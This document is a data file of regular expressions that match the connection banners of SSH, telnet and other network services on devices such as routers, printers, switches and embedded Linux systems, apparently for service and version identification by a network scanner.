+SSH-([\d.]+)-DraySSH_([\w._-]+)\n\n\rNo connection is available now\. Try again later! +SSH-([\d.]+)-Pragma FortressSSH ([\d.]+)\n +SSH-([\d.]+)-SysaxSSH_([\d.]+)\r\n +SSH-([\d.]+)-1\.00\r\n +SSH-([\d.]+)-Foxit-WAC-Server-([\d.]+ Build \d+)\n +SSH-([\d.]+)-ROSSSH\r\n +SSH-([\d.]+)-3Com OS-([\w._-]+ Release \w+)\n +SSH-([\d.]+)-3Com OS-3Com OS V([\w._-]+)\n +SSH-([\d.]+)-XXXX\r\n +SSH-([\d.]+)-xxx\r\n +SSH-([\d.]+)-OpenSSH_([\w._-]+)-HipServ\n +SSH-([\d.]+)-xlightftpd_release_([\w._-]+)\r\n +SSH-([\d.]+)-Serv-U_([\w._-]+)\r\n +SSH-([\d.]+)-CerberusFTPServer_([\w._-]+)\r\n +Soldat Admin Connection Established\.\r\nPassword request timed out\.\r\n +unknown command \r\nunknown command \r\n +\* OK SSP MagniComp SysInfo Server ([\w._-]+)\n +RPY \d \d \. \d \d+\r\nContent-Type: application/beep\+xml\r\n +\0\0\0\x0bSynergy\0\x01\0 +\x80\0\0\\0\0\0\x01I\xae\xeb\xc1\0\0\0\0\0\0\x05\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x04\0\0\0\" +USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\n +You are not welcome to use (\w+) from [\w._-]+\.\n +welcome userid=\d+ servername=\"([^"]+)\" motd=\"\" forwarding=\d+ channels=\d+ operators=\d+ maxusers=\d+ protocol=\"([\d.]+)\"\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f +\xff\xfd\x18\xff\xfb\x01\n\r\n\rPassword: +\xff\xfc\x01\r\nPlease type \[Return\] two times, to initialize telnet configuration\r\nFor HELP type \"\?\"\r\n> +\x1b\[H\x1b\[2JYou have connected to a FirstClass System\. Please login\.\.\.\r\nUserID: +\xff\xfb\x03\xff\xfb\x01\r\nCopyright \d+ Sun Microsystems, Inc\. All rights reserved\.\r\nUse is subject to license terms\.\r\n\r\n\r\nSun\(tm\) Advanced Lights Out Manager ([\d.]+) \(([\w._-]+)\)\r\n\r\nPlease login: +\xff\xfb\x01\xff\xfb\x01Connected to [-/.+\w]+!\r\n\r\nPassword: +220 SL4NT viewer service ready\r\n250 Currently connected channels: +\xff\xfb\x03\xff\xfb\0\xff\xfb\0\xff\xfd\0\xff.*\r\rFrontDoor (\d[-.\w]+)/ +\xff\xfb\x01\xff\xfb\x03\r\nOK\r\n +\xff\xfb\x03\xff\xfd\x03\xff\xfc\x06.*\nPrecidia Technologies\r\n([-.+\w]+) Remote Configuration\r\n\nPassword\? +\xff\xfb\x03\xff\xfd\x03\xff\xfb\x01WinCE/WBT Command Shell Version (\d[-.\w]+)\r\nSerial Number: (\w+) MAC Address: 0000(\w+)\r\nUUID: [-\w]+\r\nPassword: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\x1b\[2J\x1b\[Hname: +\xff\xfb\x01\n\r-> \x08\x08\x08\x08 \*\*\* EPSON Network Scanner Server \((.*)\) \*\*\*\n\r\n\r\x08\x08\x08\x08 \n\r +\xff\xfb\x01\r\nNetportExpress\(tm\) ([-/.+\w]+)\r\n.*\r\n\r\nlogin: +login: \xff\xfd\x03\xff\xfb\x03\xff\xfb\x01 +\xff\xfb\x01\r\npassword: +\xff\xfb\x01\xff\xfd\x18\xff\xfd# +\xff\xfb\x03\xff\xfb\x01\r\nPassword: +\x1b\[20;1H\r\n\r\x1b\[\?25h\x1b\[20;11H\x1b\[21;1HSession Terminated, Connect again\r\n\r\x1b\[\?25h\x1b\[21;1H\xff\xfd\x18\xff\xfb\x01\x1b\[2J\x1b\[\?7l\x1b\[[34];23r\x1b\[\?6l\x1b\[1;1H\x1b\[\?25l\x1b\[1;1HHP [-.\w]+ ProCurve Switch ([-.\w]+)\r\n\rFirmware revision ([-.\w]+)\r\n\r\r +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r.*Procurve Wireless Access Point (\d+)\r\n +Check Point FireWall-1 Client Authentication Server running on [-.\w]+\r\n\r\xff\xfb\x01\xff\xfe\x01\xff\xfb\x03User: +\xff\xfb\x01\xff\xfb\x03\r\nUsername: +\xff\xfd%\xff\xfb\x01\xff\xfd\x03\xff\xfd\x1f\xff\xfd\0\xff\xfb\0 +\xff\xfd\x03\xff\xfb\x03\xff\xfd'\xff\xfd\x18\xff\xfb\0\xff\xfd\0\xff\xfb\x01\xff\xfe\x01GUI START\n +\xff\xfd'\xff\xfd\x18| p|IBM OS/400 telnetd| o|OS/400 +\xff\xfb\x03\xff\xfb\x01\x07HP JetDirect\r\nPassword is not set\r\n +\xff\xfb\x03\xff\xfb\x01\x07HP JetDirect\r\n\r\nEnter username: +\xff\xfd\x03\xff\xfb\x01\xff\xfd!| p|HP MPE/iX telnetd +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\n\nIQinVision IQeye3 Version ([vV].*)\n\r\nType HELP +\xff\xfe%\xff\xfd\x18 +\r\nEfficient ([-.\w ]+) Router \(([-.\d/]+)\) v(\d[-.\w]+) Ready\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfe\x01Login: +\r\nRaptor Firewall Secure Gateway\.\r\n +\r\nSynchronet BBS for Win32 Version (\d[-.\w]+)\r\n +\xff\xfd\x03\xff\xfb\x01\xff\xfb\x03\x1b\[1;1H\x1b\[2K\x1b\[2;1H\x1b\[2K\x1b\[3;1H\x1b.*BayStack ([-\w_.]+) .*HW:(\w+) FW:V([\d.]+) SW:V([\d.]+)\x1b +\xff\xfb\x01\x1b\[2J\x1b\[58259456;1H\x1b\[0m\x1b\[1;1H \*\*\*\*\* \*\*\* \* \* \*\*\*\*\* \*\*\*\*\*\*\*\*\* \*\*\* \*\*\*\*\* \* \*\x1b\[2;1H +\xff\xfb\x01\n\r\n.*Bay Networks (Bay[-.: \w]+)\n\r +Check Point FireWall-1 authenticated Telnet server running on +\xff\xfb\x01\r\n\rType \"\?\" at the command prompt for a list of commands\.\n\r.*Command-> +\xff\xfb\x01\x1b\[0m\x1b\[2J\x1b\[0m\x1b\[9;20HCopyright\(C\) 1995-99 D-Link Systems Inc\.\x1b\[13;30HUser Name\x1b\[14;30HPassword\x1b\[23;10HMAC Address:\x1b\[8;29H([-.\w]+) Console Program\x1b\[13;41H +\xff\xfa\x18\x01\xff\xf0\xff\xfb\x01\xff\xfb\x03Ambit Cable Router\r\n\r\nLogin: +\n\rVina Technologies (.*) \((\d[-.\w]+ build \d+)\) +\xff\xfd\x03\xff\xfb\x03\xff\xfb\x01\x1b\[0m\x1b\[1;1H\x1b\[2J\rD\r \n\r (DES-.*) Command Line Interface\n\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfc\x1f\n\r\n\rUser Access Verification\n\r\n\r\n\r\n\r\n\rShell version (\d\S+).*Maipu Communication Technology Co\. +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\x1b.*Intel Corporation, ([-+. \w()]+) +\r\nFlowPoint/(.*) Ready\r\n.*\xff\xfb\x01\xff\xfb +Tenor Multipath Switch CDR Server\r\nConnected from IpAddr/Port# [\d.]+/\d+ to Port# \d+\r\nPassword: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\x0d\x0a\x0d\x0aCisco\x20Systems.*Console/Telnet Access of the ([-. \w]+) for Configuration Purposes +\xff\xfb\x01\n\r\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08 \x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08 +\r\n\r\nUser Access Verification\r\nPassword:\xff\xfb\x01 +\xff\xfb\x03\xff\xfb\x01\xff\xfb\x03\xff\xfb\x01.*\r\nUser Access Verification\r\n\r\nPassword: +\xff\xfb\x01\r\r\nUser Access Verification\r\r\n\r\r\nUsername: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\r\n\r\nCisco Systems Console\r\n +\xff\xfd\x18 +\xff\xfd\x18\xff\xfd\x1f\xff\xfd#\xff\xfd'\xff\xfd\ +\xff\xfb\x01\n\rUser Name : +\xff\xfd\ +\xff\xfb\x01\xff\xfb\x03\xff\xfe\x01\n\rlogin: +\xff\xfb\x03\xff\xfb\x01\xff\xfd\x1f\r\n\r\nUsername: +\xff\xfd\x18\xff\xfd \xff\xfd#\xff\xfd'\xff\xfd\| p|Openwall GNU/*/Linux telnetd +\xff\xfc\x01\r\nHP JetDirect\r\n\r\nPlease type \"\?\" for HELP, or \"/\" for current settings\r\n> +\xff\xfb\x01\xff\xfb\x03\r\nAXIS (\S+) TELNET +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03.*?FORE\x20Systems,\x20FORE\x20ES-2810.*?Version (\d[\d\.-]+) +\xff\xfb\x03\xff\xfb\x01.*ForeRunner ES-3810.*Enter Username: +\xff\xfb\x01\r\nCopyright \(C\) 1999 by Extreme Networks\r\r\n +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03.*?ES-1000\x20Fast\x20Ethernet\x20Switch\x20Console +\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x05\xff\xfd\x05Welcome to ([-\w_]+) Debug Terminal - \d*\n\r\n\r\n\rlogin: +\x1b\[0m\x1b\[2J\x1b\[01;28HCONEXANT SYSTEMS, INC\.\x1b\[02;19H ACCESS RUNNER ADSL CONSOLE PORT\x1b\[24;01H>>>\x1b\[24;01HLOGON PASSWORD>\x1b\[02;53H3\.\d+\x1b\[24;17H\x1b\[24;17H\x1b\[24;17H\x1b\[24;17H +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\n\r\nWelcome on (.*)\r\n\r\n\r\nUsername: +\xff\xfb\x01\xff\xfd\x18\nTelnet Service on the PrintServer\n\n\rPassword: | p|Hawking/TRENDnet Print Server telnetd +\xff\xfb\x01\xff\xfb\x03\r\n\r\n Welcome to OpenVMS \(TM\) Alpha Operating System, Version V([\d.]+) \r\n\r\n\rUsername: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\xff\xfd\x18\xff\xfd\x1f\xff\xfd \xff\xfd!\x07\r\n\r\n Welcome to OpenVMS \(TM\) Alpha Operating System, Version V([-\w_.]+) \r\n\r\n\rUsername: +\xff\xfd\(| p|IBM OS/390 or SNA telnetd +\xff\xfb\r\nRemotelyAnywhere Telnet Server v([\d.]+)\r\n.*\r\n\r\n([-\w_. ]+) login\r\nuser name: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\xff\xfd\x1f\xff\xfd\x18([^\r\n]+)\r\nRemotelyAnywhere Telnet Server ([\d.]+)\r\n.*\r\n\r\n([-\w_. ]+) login\r\nuser name: +\r\nVxWorks login: \xff\xfb\x01 +\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\r\n\r\nSelect Access Level\r\n===================\r\n1 - Read-Only\r\n2 - Installer\r\n3 - Administrator\r\n13008 >>> +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\nExterior router [-\w_.]+\r\nType: Cisco 2651\r\nModule: E3/T3 interface\r\n\r\n +\xff\xfe\x01\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\xff\xfd\x18Georgia SoftWorks Telnet Server for Windows NT/2000/XP/2003/Vista Ver\. ([-\w_.]+)\n\r +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\r\n\r\nCisco Systems, Inc\. Console\r\n\r\n\r\n\r\r\n\r\nUsername: +\xff\xfb\x01\xff\xfb\x03\r\n\r\n\[ORiNOCO-AP-(\d+)[-\d]*\]> Please enter password: +\xff\xfb\xfd\xff\xfb\x01\n\r\n\rFabric OS \(tm\) Release v([\w.]+)\n\r\n\r +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\n\nLantronix MSS100 Version V([\d.]+)/\d+\(\d+\)\n\r\nType HELP at the 'Local_2> ' prompt for assistance\.\n\r\n\r\n\nUsername> +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\0\r\0\r\n\x07# \0 +\xff\xfb\x01OPTIBASE MGW5100 COMMAND LINE INTERFACE\r\n +PC Telnetd ([\d.]+)\r\n\r\nlogin: +rsconfig: port rose not active\n\xff\xfd\"\r\nLinuxNode v([\d.]+) \(([-\w_.]+)\)\r\n\r\nlogin: +\xff\xfd\"\r\nLinuxNode v([\d.]+) \(([-\w_.]+)\)\r\n\r\nlogin: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r\nBusyBox v([-\w_.]+) \([^)]+\) Built-in shell \(ash\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\n# +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\n\r\nBusyBox v([-\w_.]+) \([^)]+\) Built-in shell \(ash\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\n/bin # +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\n\r\nBusyBox v([-\w_.]+) \([^)]+\) built-in shell \(ash\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\nermittle die aktuelle TTY\r\ntty is \"/dev/pts/0\"\r\nConsole Ausgaben auf dieses Terminal umgelenkt\r\n# +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\n\r\nBusyBox v([-\w_.]+) \(2006\.02\.15-21:18\+0000\) Built-in shell \(msh\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\n# +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\nRouter> +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nAmiNET\d+ login: +\xff\xfb\x03\xff\xfb\x01\r\n\r\n\x07HP (\w+) Ethernet SNMP Module\r\n ROM B\.([\d.]+)\r\n EEPROM A\.([\d.]+)\r\n HW B\.([\d.]+)\r\n\r\nEnter password: +USR5450 Telnet server v([\d.]+)\n\r\nPassword : +\xff\xfd\x03\xff\xfb\x03\xff\xfd\x01\xff\xfb\x01\d\d-\w+-\d+ \d\d:\d\d:\d\d %MSCM-I-NEWTERM: New TELNET connection from (?:[\d.]+)\r\r\nPassword: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\0\n\nLantronix ETS16 Version V([\d.]+)/\d+\(\d+\)\n\r\0\nType HELP at the 'BRTR-ETS16>' prompt for assistance\.\n\r\0\nUsername> +\r\nWelcome to slush\. \(Version ([\d.]+)\)\r\n\r\n\r\n\xff\xfb\x01\xff\xfb\x03([-\w_. ]+) login: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\x1b\[0m\x1b\[2J\x1b\[0m\x1b\[2J\x1b\[2;66H\x1b\[1m\x1b\[21;1H\x1b\[0m-+\x1b\[22;2H\x1b\[0mFunction:\x1b\[23;2H\x1b\[0mMessage:\x1b\[24;2H\x1b\[7mCTRL\+R = Refresh +\x1b\[8;12H\x1b\[0mIBM BladeCenter 4-Port Gb Ethernet Switch Module Console +\xff\xfb\x01\xff\xfe\x01\xff\xfd\x03\xff\xfb\x03\x1b\[0;1H\x1b\[J\x1b\[1;1H\x1b\[0;1H\x1b\[J\x1b\[1;1H\x1b\[0m =+\r\n AT-8326GB Management System Version ([\d.]+) \r\n Remote - Telnet\r\n +\r\nEfficient 5851 SDSL \[ATM\] Router \(5851-\d+\) v([-\d.]+) Ready\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfe\x01Login: +NPC Telnet permit one connection\.\r\n But One connection\(\) already keep alive\.\r\nGood Bye !! \r\n +\xff\xfb\x01\r\nWelcome to NetLinx v([\d.]+) Copyright AMX Corp\. \d+-\d+\r\n> +\r\nSiemens \d+ T1E1 \[COMBO\] Router \(([-\d]+)\) v([\d.]+) Ready\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfe\x01Username: +\xff\xfd\x18\xff\xfb\x01\x1b\[2J\x1b\[\?7l\x1b\[4;23r\x1b\[\?6l\x1b\[1;1H\x1b\[\?25l\x1b\[1;1HCopyright \(C\) 1991-1994 Hewlett-Packard Co\. All Rights Reserved\. +\xff\xfc\x01\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfb\x18\xff\xfd\x1f\xff\xfb\x1f\xff\xfb\"\xff\xfb\x05\r\nCLI access not allowed until the SCC is active\.\r\n\r\n +\xff\xfb\x01\n?\r\n\r?VxWorks login: +\xff\xfb\x03\xff\xfb\x01\xff\xfd\x1f\r\nVxWorks login: +\xff\xfb\x01\r\n\rPassword: | p|ZyXEL Prestige/Efficient Speedstream adsl router telnetd +\xff\xfb\x03\xff\xfb\x01password: +\r\n\xff\xfb\x01Enter password: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\w+ login: +\xff\xfb\x01\xff\xfb\x03\r\n\(\w+\) \r\nUser: +login: \xff\xfb\x01\xff\xfb\x03| p|USRobotics/Sagem router telnetd +\xff\xfb\x01\xff\xfb\x03\xff\xfb\0\xff\xfd\0login: +220 FTP server \(ver 1\.0\) ready\.\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nBusyBox on dslmodem login: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\xff\xfd\x1f\xff\xfd\x18 +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nlogin: +\r\nSystem unavailable\. Please try later\.\r\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n(FVS\w+) login: +\xff\xfb\0\xff\xfd\0\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03Login Name: +\xff\xfb\x01\xff\xfe\"\r\n\* +\xff\xfb\x03\xff\xfb\x01\r\n Disconnecting\.\.\.\r\n\n +\xff\xfb\x01\xff\xfb\x03\x1b\[2J\x1b\[0;0H\x1b\[K\x1b\[7mTelnet configuration RELEASE ([\d.]+)\x1b +Telnet server disabled\r\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n login: +\xff\xfd\x01\xff\xfd\x1f\xff\xfb\x01\xff\xfb\x03\r\r\n([\w._-]+) login: +\xff\xfd\x01\xff\xfd\x1f\xff\xfb\x01\xff\xfb\x03([\w._-]+) login: +\r\n.*Based\(loosely\) on CircleMUD ([\d.]+) +\r\n.*Based on CircleMUD ([\w._-]+),\r\n +\x1b\[0;37;40m\x1b\[2J\x1b\[0;37;40m\x1b\[1m\x1b\[15;22HAT-(\w+), version ([\d.]+)\x1b +\xff\xfb\x01\xff\xfe\x01\xff\xfd\x03\xff\xfb\x03\x1b\[0;0H\x1b\[0J\x1b\[0;0H\x1b\[0J\x1b\[1;28HAT-([-\w_.]+) Login Menu\x1b\[5;18HAT-[-\w_.]+ Local Management System Version ([\d.]+) \x1b +\xff\xfd\x03\xff\xfb\x01\x1b\[2J\x1b\[1;1H\x1b\[0m\x1b\[\?3l\x1b\(0\x1b\[2;40H\x1b\(B\x1b\(0\x1b\[2;28H\x1b\(BCSX([-\w_.]+) Local Management\x1b\[0m\x1b\(0\x1b\[5;24H\x1b\(BCABLETRON Systems, Incorporated\x1b +\xff\xfb\x01\n\rno data rcvd for version string\n\rrecv version id unsuccessful\n\rSSH Session task 0x\w+: Version Exchange Failed\n\r +\r\nSorry, this system is engaged\.\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nBusyBox on \(none\) login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nBusyBox on ([-\w_.]+) login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\n\r\nBusyBox v([-\w_.]+) \( +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r\nBusyBox v(.*) Built-in shell \(ash\)\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\(none\) login: +\xff\xfb\x01Hummingbird Communications Ltd\., Windows NT, Telnetd Version ([\d.]+) \(([-\w_.]+)\)\r\n\r\n login: +\xff\xfb\x01\xff\xfb\x03\r\nUser Access Verification\r\n\r\nPlease Enter Login Name: +\xff\xfb\x01\xff\xfb\x03\r\nUser Access Verification\r\n\r\nPlease Enter Password: +\xff\xfb\x01\xff\xfb\x03BR-telnet@FI_Core> +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\x1b\[\?3l\x1b\[2JPlease enter your user name and password!! \r\n\r\nLogin: +\xff\xfb\x01\r\nD-Link Access Point login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03.*\r\n([-\w_.]+) login: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03Login failed\.\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\nPON 262194 PAAMCO (TA \w+) Gen3\r\n\n\n\ruser: +\xff\xfd\x03\xff\xfb\x03\xff\xfd\x01\xff\xfb\x01\r\n\r\r\nUser Name: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\n\r +\*+\n\r +Welcome to ([-\w_.]+)\n\r +\*+\n\r\n\rD-Link Corp\., Inc\. Software Release ([-\w_.)(/]+)\n\rCopyright \(c\) \d+-\d+ by D-Link Corp\., Inc\.\n\r\n\rlogin: +\xff\xfb\x03\xff\xfb\x01\xff\xfd\x1f\r\nUsing telnet exposes your password\. Using ssh is a safer choice\.\r\n\r\nUsername: +\xff\xfb\x03\xff\xfb\x01\xff\xfb\x03\xff\xfb\x01\r\n\r\nPIX passwd: +\xff\xfb\x01\r\n#-+\r\n# Tasman Networks Inc\. Telnet Login\r\n# +\xff\xfd\x03\xff\xfb\x01\r\n\r\n\t\tWelcome to P333R\r\n\t\tSW version ([\d.]+)\r\n\r\n\r\nLogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nPLi dm7000 Helenite \d+ \(based on [-\w_.]+\)\r\n\rwelcome on your dreambox! - Kernel ([-\w_.]+) +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r[ *\r\n]*Welcome on your dreambox! - Kernel (\d[\w.]+) +\xff\xfe\"\xff\xfb\x01 \x1b\[H\x1b\[J\x1b\[3;1HCB-1000 S/N: (\d+)\x1b\[3;56HSymbol Technologies, Inc\.\x1b\[4;1HVersion ([-\w_.]+)\x1b\[4;44HEthernet HW address ([\w:]+)\x1b\[21;1H +\x1b\[\?25l\xff\xfb\x01\x1b\[2J\x1b\[0m\x1b\[1;1H\x1b\[2;1H\x1b\[3;1H\x1b\[4;1H ### ### ########### ########## ############# ########### ###\x1b\[5;1H #### ### ############# ############ ############# ########### ###\x1b\[6;1H[ #]{70}\x1b\[7;1H[ #]{70}\x1b\[8;1H[ #]{70}\x1b\[9;1H[ #]{70}\x1b\[10;1H[ #]{70}\x1b\[11;1H[ #]{70}\x1b\[12;1H[ #]{78}\x1b\[13;1H[ #]{78}\x1b\[14;1H\x1b\[15;1H\x1b\[16;1HEnter Ctrl-Y to begin\.\x1b\[18;3H\*{35} +\xff\xfb\x01\x1b\[2J\x1b\[0m\x1b\[1;1H \*\*\*\*\* \*\*\* \* \* \*\*\*\*\* \*\*\*\*\*\*\*\*\* \*\*\* +\xff\xfb\x03\xff\xfb\x01\r\n\r\n\*+\r\n\* Welcome to D-Link Wireless Print Server \*\r\n\* +Telnet Console +\*\r\n\*+\r\n\r\nServer Name : ([\w._-]+)\0+\r\nServer Model : ([\w._+-]+)\0+\r\nF/W Version : ([\w._-]+)\0.\0+\r\nMAC Address : ([\w ]+) +\xff\xfb\x01\xff\xfb\x03\r\n\r\n\x1b\[H\x1b\[JWelcome at ActiveFax Server\.\r\n\r\n +\xff\xfb\x01\xff\xfb\x03RemoteX Telnet Server V([\d.]+)\n\r\n\rc:\\> +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\n\r +\*+\n\r +Welcome to ZXDSL 831\n\r +\*+\n\r\n\rZTE Corporation, Software Release VIK-([-\w_.]+)\n\r +\*{60}\r\n\r\nThis session allows you to set the TCPIP parameters for your\r\nDell Laser Printer Printer Dell (\w+) MFP Ethernet internal network device, with a hardware\r\naddress of ([0-9A-F:]{17}) \(MSB, Canonical\)\.\r\nIt's an ethernet card\.\r\nNetwork Firmware Version is V([\w._-]+)\(\w+ MFP\) ([\d-]+)\.\r\nSystem Up Time is ([^\r\n.]+)\.\r\n\r\n +\xff\xfb\"\xff\xfb\x03\xff\xfb\x01\xff\xfb\0\xff\xfd\0\n\r\nWelcome to the PDP-10 simulator\r\n\n +\xff\xfb\x01\(Enable\) Password\? +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\n\r\nCGX3224 Switch Manager Console\. Version: CGX([\d.]+) Bld (\d+),.*\r\n\r\nPassword: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\x1b\[0m\x1b\[2J\x1b\[01;00H\r\n\r\0\r\n\r\0[ \t]+\r\n\r\0\r\n\r\0\r\0VersaXpress HPNA Routing Concentrator\r\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nSportster Pro ([\d.]+) Image Sagem D-BOX2 - Kernel ([-\w_.]+) +\xff\xfb\x01\xff\xfb\x03\r\0\n\*\*\* Lantronix Universal Device Server \*\*\*\r\0\nSerial Number (\d+) MAC address ([\w:]+)\n\r\0Software version 0*([\d.]+) \((\d+)\)\r\0\n\r\0\nPress Enter to go into Setup Mode \r\0\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03Fritz!Box web password: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nFritz!Box web password: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nDD-WRT v([-\w_+. ]+) Date: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nDD-WRT v([^\r\n]+)\r\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03DD-WRT (v\d+)[^\r\n]*\r\nRelease: ([^\r\n]+)\r\n\xff\r\ngateway login: +\xff\xfd\x18\xff\xfd \xff\xfd#\xff\xfd\x1f\xff\xfd'\xff\xfd\ +\xff\xfb\x03\xff\xfb\x01\r\n\r\nU\.S\. Robotics\r\nTotal Control \(tm\) NETServer 8/16\r\n\r\nlogin: | p|USRobotics TotalControl NetServer 8/16 telnetd +\xff\xfb\x01\r\n\r\n\*\*\* ADTRAN TSU ESP \*\*\*\r\n\r\n ENTER PASSWORD -> \xff\xfd\x03\xff\xfb\x03 +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\n\nLantronix (SCS\d+) Version V([\d/().]+)\n\r\nType HELP +\xff\xfb\x03\xff\xfb\x01\r\n\r\nPassword : +\xff\xfb\x01\xff\xfb\x01\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\n\*+\r\n\* Copyright\(c\) 1998-2006 Huawei Technologies Co\., Ltd\. All rights reserved\. \*\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\r\n\r\n\r\nWelcome to X2301 version V\.([-\w_+. ()]+) IPSec from [\d/]+ [\d:]+\r\nsystemname is ([-\w_.]+), +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\n\r *\**\n\r *Welcome to Viking II\. \n\r *\**\n\r\n\rGlobespanVirata Inc\., Software Release VIK-([-\w_.]+)\n\r +\xff\xfb\x01\xff\xfe\x01\xff\xfd\x03\xff\xfb\x03\x1b\[1;1H\x1b\[J\x1b\[22;0H>\x1b\[1K\x1b\[999D\r\0login: +\x1b\[2J\x1b\[1;1fATOS Telnet Server\r\n\r\nCTRL\+d to exit\n\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03Init Command Line Interface\.\. \r\nBoot Version: [\d.]+\r\nBoot Date: [\d :/]+\r\nATOS Version: ([\d.]+) \([^)]+\)\r\nATOS Date: [\d :/]+\r\nHardware: \w+\r\nProduct Code : \d+\r\nSerial Number : (\d+)\r\nLAN0 MAC Address : ([A-F0-9:]+)\r\nADSL Modem SW version: [\w._-]+ *\r\nADSL Modem API version: \d+\r\nADSL Driver version: [\w._-]+\r\n([\w._-]+) release: ([\w._-]+)+\r\nHW encryption not supported\r\nVinetic fw version : [\w._-]+\r\n\r\nUser name : +\xff\xfb\x01\xff\xfe\x01\n\r\n\r\n\r\n\n\n\n\r\t=+\n\r\t +Samsung SWL-6100AP Configuration\n\r\t +\xff\xfb\x01\xff\xfb\x03\r\0\nMAC address (\w+)\n\r\0Software version ([\w._-]+ \(\d+\)) XPTEXE\r\0\n\n\r\0Press Enter to go into Setup Mode \n\r\0 +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03USR ADSL Gateway\r\nLogin: +\xff\xfb\x03\xff\xfb\x01\r\nService Processor login: 